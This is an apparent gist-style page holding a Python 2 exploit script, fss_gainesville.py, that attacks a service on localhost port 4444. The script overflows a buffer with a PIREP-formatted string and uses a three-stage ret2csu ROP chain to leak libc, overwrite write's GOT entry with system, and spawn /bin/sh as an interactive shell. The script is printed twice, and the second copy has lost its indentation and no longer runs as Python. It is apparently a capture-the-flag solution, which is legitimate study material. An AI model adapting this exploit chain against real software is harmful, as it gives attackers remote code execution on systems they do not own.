otms61 · August 29, 2015 14:23
diff --git a/fss_gainesville.py b/fss_gainesville.py
 #!/usr/bin/python
 # -*- coding: utf-8 -*-
 import socket
 import struct
 import telnetlib
 from time import sleep


 def sock(remoteip, remoteport):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((remoteip, remoteport))
    f = s.makefile('rw', bufsize=0)
    return s, f


 def read_until(f, delim='\n'):
    data = ''
    while not data.endswith(delim):
        data += f.read(1)
    return data


 def p(a):
    return struct.pack("<Q", a)


 def u(a):
    return struct.unpack("<Q", a)[0]


 def shell(s):
    t = telnetlib.Telnet()
    t.sock = s
    t.interact()


 libc_write_offset = 0xeb860
 libc_system_offset = 0x46640

 puts_plt = 0x400740
 csu_gadget1 = 0x401896
 csu_gadget2 = 0x401880
 write_got = 0x602218
 read_got = 0x602238

 binsh = '/bin/sh\x00'

 s, f = sock('localhost', 4444)

 s.send('5\n')
 payload = 'UA /OV OKC /TM 1522 /FL 080 /TP CE172 / SK020BKN'
 payload += 'a'*104
 # stage 1 gadgets to leak write address
 payload += p(csu_gadget1)
 payload += p(0xdeadbeaf)
 payload += p(0)  # rbx
 payload += p(1)  # rbp
 payload += p(write_got)  # r12
 payload += p(8)  # r13 = rdx = arg3
 payload += p(write_got)  # r14 = rsi = arg2
 payload += p(0)  # r15 = edi = arg1
 payload += p(csu_gadget2)  # rbp

 # stage 2 gadgets to overwirte write address by system address
 payload += p(0xdeadbeaf)
 payload += p(0)  # rbx
 payload += p(1)  # rbp
 payload += p(read_got)  # r12
 payload += p(16)  # r13 = rdx = arg3
 payload += p(write_got)  # r14 = rsi = arg2
 payload += p(0)  # r15 = edi = arg1
 payload += p(csu_gadget2)  # rbp

 # stage 3 gadgets to call system("/bin/sh")
 payload += p(0xdeadbeaf)
 payload += p(0)  # rbx
 payload += p(1)  # rbp
 payload += p(write_got)  # r12 write_got changed to system addr
 payload += p(0)  # r13 = rdx = arg3
 payload += p(0)  # r14 = rsi = arg2
 payload += p(write_got+0x8)  # r15 = edi = arg1
 payload += p(csu_gadget2)  # rbp

 sleep(0.1)
 s.send(payload+'\n')
 read_until(f, 'PIREP is now on file\n')

 libc_write = u(s.recv(8))
 libc_base = libc_write - libc_write_offset
 libc_system = libc_base + libc_system_offset

 print '[*] libc base: {}'.format(hex(libc_base))
 print '[*] libc write: {}'.format(hex(libc_write))
 print '[*] libc system: {}'.format(hex(libc_system))

 s.send(p(libc_system)+binsh)
 shell(s)
	#!/usr/bin/python
	# -- coding: utf-8 --
	import socket
	import struct
	import telnetlib
	from time import sleep


	def sock(remoteip, remoteport):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((remoteip, remoteport))
	f = s.makefile('rw', bufsize=0)
	return s, f


	def read_until(f, delim='\n'):
	data = ''
	while not data.endswith(delim):
	data += f.read(1)
	return data


	def p(a):
	return struct.pack("<Q", a)


	def u(a):
	return struct.unpack("<Q", a)[0]


	def shell(s):
	t = telnetlib.Telnet()
	t.sock = s
	t.interact()


	libc_write_offset = 0xeb860
	libc_system_offset = 0x46640

	puts_plt = 0x400740
	csu_gadget1 = 0x401896
	csu_gadget2 = 0x401880
	write_got = 0x602218
	read_got = 0x602238

	binsh = '/bin/sh\x00'

	s, f = sock('localhost', 4444)

	s.send('5\n')
	payload = 'UA /OV OKC /TM 1522 /FL 080 /TP CE172 / SK020BKN'
	payload += 'a'*104
	# stage 1 gadgets to leak write address
	payload += p(csu_gadget1)
	payload += p(0xdeadbeaf)
	payload += p(0) # rbx
	payload += p(1) # rbp
	payload += p(write_got) # r12
	payload += p(8) # r13 = rdx = arg3
	payload += p(write_got) # r14 = rsi = arg2
	payload += p(0) # r15 = edi = arg1
	payload += p(csu_gadget2) # rbp

	# stage 2 gadgets to overwirte write address by system address
	payload += p(0xdeadbeaf)
	payload += p(0) # rbx
	payload += p(1) # rbp
	payload += p(read_got) # r12
	payload += p(16) # r13 = rdx = arg3
	payload += p(write_got) # r14 = rsi = arg2
	payload += p(0) # r15 = edi = arg1
	payload += p(csu_gadget2) # rbp

	# stage 3 gadgets to call system("/bin/sh")
	payload += p(0xdeadbeaf)
	payload += p(0) # rbx
	payload += p(1) # rbp
	payload += p(write_got) # r12 write_got changed to system addr
	payload += p(0) # r13 = rdx = arg3
	payload += p(0) # r14 = rsi = arg2
	payload += p(write_got+0x8) # r15 = edi = arg1
	payload += p(csu_gadget2) # rbp

	sleep(0.1)
	s.send(payload+'\n')
	read_until(f, 'PIREP is now on file\n')

	libc_write = u(s.recv(8))
	libc_base = libc_write - libc_write_offset
	libc_system = libc_base + libc_system_offset

	print '[*] libc base: {}'.format(hex(libc_base))
	print '[*] libc write: {}'.format(hex(libc_write))
	print '[*] libc system: {}'.format(hex(libc_system))

	s.send(p(libc_system)+binsh)
	shell(s)